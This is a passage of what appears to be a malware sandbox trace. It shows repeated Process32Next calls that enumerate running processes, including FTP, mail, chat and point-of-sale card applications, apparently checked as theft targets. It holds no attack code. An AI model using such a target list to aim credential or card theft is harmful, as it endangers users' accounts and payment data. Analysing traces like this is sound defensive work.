szExeFile="services.exe")) returned 1 [0239.883] Process32Next (in: hSnapshot=0x22c8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x220, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0239.885] Process32Next (in: hSnapshot=0x22c8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x278, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3c, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0239.889] Process32Next (in: hSnapshot=0x22c8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0239.891] Process32Next (in: hSnapshot=0x22c8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x32c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x200, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0239.893] Process32Next (in: hSnapshot=0x22c8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0239.896] Process32Next (in: hSnapshot=0x22c8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x37c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0239.898] Process32Next (in: hSnapshot=0x22c8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x38c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0239.901] Process32Next (in: hSnapshot=0x22c8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0239.903] Process32Next (in: hSnapshot=0x22c8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0239.905] Process32Next (in: hSnapshot=0x22c8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x49, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0239.907] Process32Next (in: hSnapshot=0x22c8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x468, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0239.911] Process32Next (in: hSnapshot=0x22c8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0239.913] Process32Next (in: hSnapshot=0x22c8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x568, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0239.916] Process32Next (in: hSnapshot=0x22c8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x640, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x31, th32ParentProcessID=0x620, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0239.993] Process32Next (in: hSnapshot=0x22c8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x674, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0239.996] Process32Next (in: hSnapshot=0x22c8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0239.998] Process32Next (in: hSnapshot=0x22c8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0240.001] Process32Next (in: hSnapshot=0x22c8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x558, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0240.003] Process32Next (in: hSnapshot=0x22c8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x824, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="SkypeHost.exe")) returned 1 [0240.006] Process32Next (in: hSnapshot=0x22c8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x884, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0240.008] Process32Next (in: hSnapshot=0x22c8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x8f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0240.010] Process32Next (in: hSnapshot=0x22c8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa74, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0240.013] Process32Next (in: hSnapshot=0x22c8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0240.016] Process32Next (in: hSnapshot=0x22c8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc6c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0240.019] Process32Next (in: hSnapshot=0x22c8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0240.022] Process32Next (in: hSnapshot=0x22c8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0240.025] Process32Next (in: hSnapshot=0x22c8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x470, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0240.027] Process32Next (in: hSnapshot=0x22c8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbe0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0240.030] Process32Next (in: hSnapshot=0x22c8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x878, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0240.095] Process32Next (in: hSnapshot=0x22c8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0240.100] Process32Next (in: hSnapshot=0x22c8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1038, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="this.exe")) returned 1 [0240.103] Process32Next (in: hSnapshot=0x22c8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1040, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="love gas.exe")) returned 1 [0240.105] Process32Next (in: hSnapshot=0x22c8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1048, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="against.exe")) returned 1 [0240.108] Process32Next (in: hSnapshot=0x22c8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1064, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="borndegreereturn.exe")) returned 1 [0240.111] Process32Next (in: hSnapshot=0x22c8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1070, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="national.exe")) returned 1 [0240.115] Process32Next (in: hSnapshot=0x22c8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1078, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="our_beat.exe")) returned 1 [0240.117] Process32Next (in: hSnapshot=0x22c8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1080, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="piece.exe")) returned 1 [0240.120] Process32Next (in: hSnapshot=0x22c8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1088, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="lighttough.exe")) returned 1 [0240.122] Process32Next (in: hSnapshot=0x22c8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1090, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="factorfree.exe")) returned 1 [0240.125] Process32Next (in: hSnapshot=0x22c8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1098, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="standard.exe")) returned 1 [0240.127] Process32Next (in: hSnapshot=0x22c8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="optionalso.exe")) returned 1 [0240.130] Process32Next (in: hSnapshot=0x22c8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="speech-however-surface.exe")) returned 1 [0240.137] Process32Next (in: hSnapshot=0x22c8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="hang around rise.exe")) returned 1 [0240.140] Process32Next (in: hSnapshot=0x22c8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="kill.exe")) returned 1 [0240.142] Process32Next (in: hSnapshot=0x22c8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="disease_victim_can.exe")) returned 1 [0240.146] Process32Next (in: hSnapshot=0x22c8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="decideenergytend.exe")) returned 1 [0240.176] Process32Next (in: hSnapshot=0x22c8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x110c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0240.178] Process32Next (in: hSnapshot=0x22c8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1114, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0240.180] Process32Next (in: hSnapshot=0x22c8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1120, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0240.183] Process32Next (in: hSnapshot=0x22c8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1128, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0240.186] Process32Next (in: hSnapshot=0x22c8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x113c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0240.189] Process32Next (in: hSnapshot=0x22c8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0240.192] Process32Next (in: hSnapshot=0x22c8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1150, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0240.195] Process32Next (in: hSnapshot=0x22c8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1158, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0240.199] Process32Next (in: hSnapshot=0x22c8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1168, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0240.207] Process32Next (in: hSnapshot=0x22c8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1170, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0240.210] Process32Next (in: hSnapshot=0x22c8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0240.214] Process32Next (in: hSnapshot=0x22c8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0240.217] Process32Next (in: hSnapshot=0x22c8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1198, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0240.220] Process32Next (in: hSnapshot=0x22c8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0240.223] Process32Next (in: hSnapshot=0x22c8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0240.226] Process32Next (in: hSnapshot=0x22c8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0240.229] Process32Next (in: hSnapshot=0x22c8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0240.232] Process32Next (in: hSnapshot=0x22c8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0240.235] Process32Next (in: hSnapshot=0x22c8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0240.238] Process32Next (in: hSnapshot=0x22c8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0240.241] Process32Next (in: hSnapshot=0x22c8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0240.248] Process32Next (in: hSnapshot=0x22c8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0240.250] Process32Next (in: hSnapshot=0x22c8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1204, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0240.253] Process32Next (in: hSnapshot=0x22c8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x120c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0240.256] Process32Next (in: hSnapshot=0x22c8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0240.259] Process32Next (in: hSnapshot=0x22c8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x121c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0240.262] Process32Next (in: hSnapshot=0x22c8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1224, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0240.265] Process32Next (in: hSnapshot=0x22c8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0240.268] Process32Next (in: hSnapshot=0x22c8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1238, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0240.270] Process32Next (in: hSnapshot=0x22c8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0240.274] Process32Next (in: hSnapshot=0x22c8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1248, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0240.277] Process32Next (in: hSnapshot=0x22c8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0240.280] Process32Next (in: hSnapshot=0x22c8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1258, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0240.285] Process32Next (in: hSnapshot=0x22c8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1260, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0240.288] Process32Next (in: hSnapshot=0x22c8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1268, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0240.290] Process32Next (in: hSnapshot=0x22c8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0240.295] Process32Next (in: hSnapshot=0x22c8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1280, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0240.297] Process32Next (in: hSnapshot=0x22c8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1288, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0240.300] Process32Next (in: hSnapshot=0x22c8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, 